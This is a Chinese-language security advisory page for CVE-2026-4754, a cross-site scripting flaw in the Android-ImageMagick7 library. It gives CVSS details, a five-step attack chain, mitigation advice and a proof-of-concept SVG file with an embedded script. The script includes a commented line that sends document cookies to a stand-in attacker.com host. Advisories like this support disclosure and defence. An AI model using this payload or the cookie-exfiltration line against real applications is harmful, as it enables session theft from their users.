IPBUF安全漏洞报告
English
CVE-2026-4754 CVSS 6.1 中危

CVE-2026-4754 Android-ImageMagick7 存储型XSS漏洞

披露日期: 2026-03-24

漏洞信息

漏洞编号
CVE-2026-4754
漏洞类型
跨站脚本 (XSS)
CVSS评分
6.1 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
MolotovCherry Android-ImageMagick7

相关标签

XSSCWE-79Android-ImageMagick7跨站脚本Web安全

漏洞概述

CVE-2026-4754 是 MolotovCherry Android-ImageMagick7 组件中的一个 CWE-79 跨站脚本漏洞。该漏洞影响了 7.1.2-11 之前的版本。攻击者可利用此漏洞,诱导用户处理特制的恶意图像文件,从而在用户浏览器上下文中执行任意 JavaScript 代码。尽管需要用户交互,但攻击成功可能导致用户敏感信息泄露或数据完整性受损。

技术细节

该漏洞源于 Android-ImageMagick7 在处理特定图像文件(可能包含嵌入脚本或元数据)时,未能正确过滤或转义恶意内容。根据 CVSS 向量 AV:N/AC:L/PR:N/UI:R/S:C,攻击者无需认证即可通过网络发起攻击。由于应用缺乏对渲染内容的严格上下文隔离,当受害者加载并交互恶意文件时,注入的脚本会执行。这利用了 ImageMagick 对复杂图像格式的解析特性,导致反射型或存储型 XSS,进而窃取 Session ID 或进行钓鱼攻击。

攻击链分析

STEP 1
1. 侦察
攻击者确认目标应用使用了 MolotovCherry Android-ImageMagick7 库且版本低于 7.1.2-11。
STEP 2
2. 构造载荷
攻击者制作包含恶意 JavaScript 代码的特制图像文件(如 SVG 或包含脚本元数据的图片)。
STEP 3
3. 投递载荷
攻击者通过网络将恶意图像上传至目标应用或发送链接诱导用户点击(UI:R)。
STEP 4
4. 执行利用
当目标用户使用应用加载或查看该图像时,Android-ImageMagick7 解析图像并执行其中嵌入的脚本。
STEP 5
5. 达成效果
脚本在用户上下文中运行,窃取敏感信息(如 Cookie)或篡改页面内容(C:L/I:L)。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- Proof of Concept for CVE-2026-4754 --> <!-- Create a malicious SVG image to trigger XSS --> <svg xmlns="http://www.w3.org/2000/svg"> <rect width="100" height="100" fill="red" /> <script type="text/javascript"> // Demonstrate execution by showing an alert alert('CVE-2026-4754 XSS Triggered'); // Example: Exfiltrate data // fetch('https://attacker.com/collect?c=' + document.cookie); </script> </svg>

影响范围

MolotovCherry Android-ImageMagick7 < 7.1.2-11

防御指南

临时缓解措施
如果无法立即升级,建议在应用层面禁用对包含脚本内容的图像格式(如 SVG)的解析功能,或者使用沙箱环境隔离图像处理逻辑,防止恶意脚本在主应用上下文中执行。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表